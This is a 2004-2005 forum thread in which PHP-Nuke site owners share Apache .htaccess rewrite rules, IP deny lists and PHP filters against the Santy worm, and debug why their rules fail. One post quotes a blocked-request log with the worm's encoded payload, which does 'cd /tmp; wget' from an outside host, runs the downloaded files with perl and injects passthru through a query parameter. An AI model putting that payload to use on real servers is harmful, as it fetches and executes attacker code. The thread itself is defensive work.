Santy Worm attach prevention - RECAP

yaanno · New Member Joined: Dec 29, 2004 Posts: 2

Hia all,

Perhaps we could redirect all queries containin' the "http://" string in a way:

#variant-5 redirect all inner

Only registered users can see links on this board!
Get registered or login to the forums!

request
RewriteCond %{QUERY_STRING} ^(.*)http://(.*) [NC,OR]
#variant-6 redirect all inner http request regardless if encoded
RewriteCond %{QUERY_STRING} ^(.*)http%3A%2F%2F(.*) [NC]

sorry for my bad english guys Smile

yaanno

Raven · Posted: Wed Dec 29, 2004 7:51 am

Your English is fine Smile

That would work too. And for those that can't use .htaccess, NukeSentinel filters for those anyway. Thanks for this contribution!

yaanno · New Member Joined: Dec 29, 2004 Posts: 2

Raven wrote:

Your English is fine Smile

That would work too. And for those that can't use .htaccess, NukeSentinel filters for those anyway. Thanks for this contribution!

Thanks Raven,

Unfortunately these solutions doesn't work without mod_rewrite. And the excellent Sentinel is for newer nuke systems only. So what about the older versions? poor guys Wink

My journal currently run under nuke 5.6 (oh my god! Smile

) and broken down by this worm. So i did a hack in my mainfile.php in this way:

foreach ($HTTP_GET_VARS as $secvalue)
{
if (eregi("<[^>]*script*\"?[^>]*>", $secvalue))
{
die ("I don't like you...");
}
elseif (eregi("http", $secvalue))
{
die ("Don't bother me...");
}
elseif (eregi("cd", $secvalue))
{
die ("Go away...");
}
elseif (eregi("cd /tmp;wget", $secvalue))
{
die ("I call the FBI...");
}
}

Cheers and happy Worm-ending Year,

yaanno

Raven · Posted: Wed Dec 29, 2004 8:10 am

Correct again! As has been stated elsewhere, if you're with a host that uses Apache and not mod_rewrite - 86 the host and get another one Rolling Eyes

cprompt · Regular Joined: Jun 08, 2004 Posts: 64

LWP::Simple and lwp-trivial STILL getting thru on my site.

my htaccess:
from the top:

Code:

RewriteEngine on
RewriteCond %{REQUEST_URI} ^visualcoders[NC,OR]
RewriteCond %{REQUEST_URI} ^envidiosos[NC,OR]
RewriteCond %{REQUEST_URI} ^civa[NC,OR]
RewriteCond %{REQUEST_URI} ^filepack.superbr.org[NC,OR]
RewriteCond %{REQUEST_URI} ^lwp-trivial[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Bullseye.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailCollector.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Crescent.*Internet.*ToolPak.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^CherryPicker.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^fastlwspider/1.0.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^SurfWalker.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWebPage.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP::Trivial [NC]
RewriteCond %{QUERY_STRING} rush=([^&]+)[NC]
#redirect all inner http:// request
RewriteCond %{QUERY_STRING} ^(.*)http://(.*) [NC,OR]
#redirect all inner http request regardless if encoded
RewriteCond %{QUERY_STRING} ^(.*)http%3A%2F%2F(.*) [NC]
RewriteRule ^.*$ noID.php [L]

the reason I have multiple entries for lwp simple and trivial is because I was trying ANYTHING!

I also placed this in my header.php file.

Code:

if (strpos($HTTP_USER_AGENT, 'LWP::Simple') > 0) {
exit;
};
if (strpos($HTTP_USER_AGENT, 'lwp-trivial') > 0) {
exit;
};
if (strpos($HTTP_REFERER, 'myhost.gb.com') > 0) {
exit;
};
if (strpos($HTTP_REFERER, 'mall.uk.net') > 0) {
exit;
};

Raven · Posted: Mon Jan 03, 2005 11:49 am

Replace ALL your lwp code with one line:

RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]

cprompt · Regular Joined: Jun 08, 2004 Posts: 64

I made your advised change raven and...
I'm STILL getting hit.
Got 10 more emails in my inbox this morning.
LWP::Simple

Quote:

Date & Time: 2005-01-04 07:43:10
Blocked IP: 69.61.61.146
User ID: Anonymous (1)
Reason: Abuse-Script
--------------------
User Agent: LWP::Simple/5.803
Query String:

Only registered users can see links on this board!
Get registered or login to the forums!

%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;
wget%20%0Aatlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;
wget%20atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;
perl%20%0Asess_189f0f0889555397a4de5485dd611112;
rm%20sess_189f0f0889555397a4de5485dd611112;
perl%20%0Asess_189f0f0889555397a4de5485dd611111;
rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B
%20%65%63%68%6F%20%5F%45%4E%44%5F&
highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54
%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68
%5D%29.%2527\';
Forwarded For: none
Client IP: none
Remote Address: 69.61.61.146
Remote Port: 43531
Request Method: GET

Raven · Posted: Tue Jan 04, 2005 9:48 am

Post your .htaccess. I know this works. Something is wrong but it's not that code.

cprompt · Regular Joined: Jun 08, 2004 Posts: 64

Code:

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]
RewriteCond %{REQUEST_URI} ^visualcoders [NC]
RewriteCond %{REQUEST_URI} ^envidiosos [NC]
RewriteCond %{REQUEST_URI} ^civa [NC]
RewriteCond %{REQUEST_URI} ^filepack.superbr.org [NC]
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
RewriteRule ^.*$

Only registered users can see links on this board!
Get registered or login to the forums!

[L]

PHP_FLAG output_buffering on

deny from 148.244.150.52
deny from 200.106.110.236
deny from 200.181.83.243
deny from 219.95.196.80
deny from 68.60.213.202
deny from 200.181.83.243
deny from 148.244.150.52
deny from 219.95.196.80
deny from 200.72.173.120
deny from 209.237.238.181
deny from 192.168.163.167
deny from 68.98.231.137
deny from 82.160.30.194
deny from 81.215.255.48
deny from 67.165.48.29
deny from 209.13.239.235
deny from 66.82.9.54
deny from 209.237.238.180
deny from 200.64.54.223
deny from 212.200.53.61
deny from 81.214.57.246
deny from 211.157.36.6
deny from 211.157.36.4
deny from 12.175.0.35
deny from 203.162.44.73
deny from 213.103.65.23
deny from 10.90.24.11
deny from 80.132.120.148
deny from 209.237.238.166
deny from 213.103.194.140
deny from 217.220.100.158
deny from 207.230.138.240
deny from 208.180.220.197
deny from 66.69.165.44
deny from 213.103.212.15
deny from 81.15.156.33
deny from 203.203.82.241
deny from 212.244.141.2
deny from 202.58.199.241
deny from 132.249.20.69
deny from 195.151.252.177
deny from 195.151.101.150
deny from 217.23.241.101
deny from 64.86.231.98
deny from 210.177.248.65
deny from 12.170.99.234
deny from 67.131.119.83
deny from 80.58.7.235
deny from 80.58.7.235
deny from 80.58.7.235
deny from 80.58.50.42
deny from 66.98.250.82

Raven · Posted: Tue Jan 04, 2005 9:59 am

You aren't usinh [NC,OR]. As a result, the rewrite engine treats those as AND. You had them originally. Put them back.

Code:

RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{REQUEST_URI} ^visualcoders [NC,OR]
RewriteCond %{REQUEST_URI} ^envidiosos [NC,OR]
RewriteCond %{REQUEST_URI} ^civa [NC,OR]
RewriteCond %{REQUEST_URI} ^filepack.superbr.org [NC,OR]
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
RewriteRule ^.*$

Only registered users can see links on this board!
Get registered or login to the forums!

[L]

cprompt · Regular Joined: Jun 08, 2004 Posts: 64

thanks raven I'll give that a try. Thanks for your patience.

ring_c · Involved Joined: Dec 28, 2003 Posts: 274 Location: Israel

I've tried your code in the .htaccess file, but I still get emails such as this one:

Quote:

Date & Time: 2005-03-03 03:33:55
Blocked IP: 213.167.167.52
User ID: משתמש לא רשום (1)
Reason: Abuse-Harvest
String Match: lwp::simple
--------------------
User Agent: LWP::Simple/5.76
Query String:

Only registered users can see links on this board!
Get registered or login to the forums!

Forwarded For: none
Client IP: none
Remote Address: 213.167.167.52
Remote Port: 15790
Request Method: GET

here's my .htaccess. could you tell me what's wrong:

Code:

# $Author: zx $
# $Date: 2003/08/17 14:03:21 $

#Check for Santy Worms and redirect them to a phantom site
#Variant-1
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
#Variant-2
RewriteCond %{REQUEST_URI} ^visualcoders [NC,OR]
#Variant-3
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
#Variant-4
#RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
RewriteRule ^.*$ http://www.goawayanddontcomeback.com [L]

# deny most common except .php
<FilesMatch "\.(inc|tpl|h|ihtml|sql|ini|conf|class|bin|spd|theme|module)$">
</FilesMatch>

<Limit GET PUT POST>
Order Allow,Deny
deny from 200.
Allow from all
</Limit>

<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from 81.10.16
deny from 212.98.150
deny from 192.118.48.248

64bitguy · Posted: Thu Mar 03, 2005 7:50 am

Try this instead:

Find:

Code:

#Check for Santy Worms and redirect them to a phantom site
#Variant-1
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
#Variant-2
RewriteCond %{REQUEST_URI} ^visualcoders [NC,OR]
#Variant-3
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
#Variant-4
#RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]

And replace with:

Code:

RewriteCond %{QUERY_STRING} ^(.*)configdir(.*) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20

That pretty much covers mine.

ring_c · Involved Joined: Dec 28, 2003 Posts: 274 Location: Israel

Thanks alot. updated.
Now we'll see if more emails are coming in...

thanks again!

ring_c · Involved Joined: Dec 28, 2003 Posts: 274 Location: Israel

Yet, no go! Sad

here's one of three email I got today:

Code:

Date & Time: 2005-03-03 17:56:03
Blocked IP: 213.196.37.240
User ID: îùúîù ìà øùåí (1)
Reason: Abuse-Harvest
String Match: lwp::simple
--------------------
User Agent: LWP::Simple/5.36
Query String:

Only registered users can see links on this board!
Get registered or login to the forums!

Forwarded For: none
Client IP: none
Remote Address: 213.196.37.240
Remote Port: 2720
Request Method: GET

HELP!!!!!!!!!!!!

Raven · Posted: Fri Mar 04, 2005 2:37 am

ring_c, do you have this line in your .htaccess?

RewriteEngine on

ring_c · Involved Joined: Dec 28, 2003 Posts: 274 Location: Israel

Raven wrote:

ring_c, do you have this line in your .htaccess?

RewriteEngine on

Nope...

Here's my current .htaccess:

Code:

# $Author: zx $
# $Date: 2003/08/17 14:03:21 $

RewriteCond %{QUERY_STRING} ^(.*)configdir(.*) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
RewriteRule ^.*$ http://www.goawayanddontcomeback.com [L]

# deny most common except .php
<FilesMatch "\.(inc|tpl|h|ihtml|sql|ini|conf|class|bin|spd|theme|module)$">
</FilesMatch>

<Limit GET PUT POST>
Order Allow,Deny
deny from 200.
Allow from all
</Limit>

<Files 403.shtml>
order allow,deny
allow from all
</Files>

Anything??? Sad

Raven · Posted: Fri Mar 04, 2005 3:36 am

Without that line, mod_rewrite isn't turned on. Therefore, it won't work. look at the examples above to see how it's supposed to be Wink

ring_c · Involved Joined: Dec 28, 2003 Posts: 274 Location: Israel

Quote:

Without that line, mod_rewrite isn't turned on. Therefore, it won't work. look at the examples above to see how it's supposed to be

Oops... how have I missed that?!

Just a sec.... is mod_rewrite a modudle I need to install with my phpnuke or something?

Raven · Posted: Fri Mar 04, 2005 4:23 am

mod_rewrite is an Apache module. Run phpinfo() to see if it is installed.

VinDSL · Posted: Fri Mar 04, 2005 5:05 am

Raven wrote:

Without that line, mod_rewrite isn't turned on.
Therefore, it won't work. look at the examples above to see how it's
supposed to be

True! Generally speaking, rewrite configurations are not inherited, even
though the conditions, rules, et cetera are. So, I always add this line (once)
at the top of all my .htaccess file[s] just to play it safe... Wink

ring_c · Involved Joined: Dec 28, 2003 Posts: 274 Location: Israel

Quote:

mod_rewrite is an Apache module. Run phpinfo() to see if it is installed.

I don't have access to the shell (command prompt). Sad

Is there any other way to tell?

ring_c · Involved Joined: Dec 28, 2003 Posts: 274 Location: Israel

Oh, I've found my host company provides a link to run phpinfo(). I've searched for "rewrite" and only found that:

Under configuration/Standard there's a table. the relevant line says:
Directove: url_rewriter.tags
Local Value: a=href,area=href,frame=src,form=,fieldset=
Master Value: a=href,area=href,frame=src,form=,fieldset=

Is that ok?

Raven · Posted: Fri Mar 04, 2005 7:34 am

You don't need a shell anyway. Just save this script to a file and run it:

Code:

<?
phpinfo();
?>

Scroll down to the Apache: Loaded Modules section and see if mod_rewrite is listed

Code:

mod_auth_passthrough, mod_log_bytes, mod_bwlimited, mod_php4, mod_frontpage, mod_ssl, mod_setenvif, mod_so, mod_auth, mod_access, MOD_REWRITE, mod_alias, mod_userdir, mod_actions, mod_imap, mod_asis, mod_cgi, mod_dir, mod_autoindex, mod_include, mod_status, mod_negotiation, mod_mime, mod_log_config, mod_env, http_core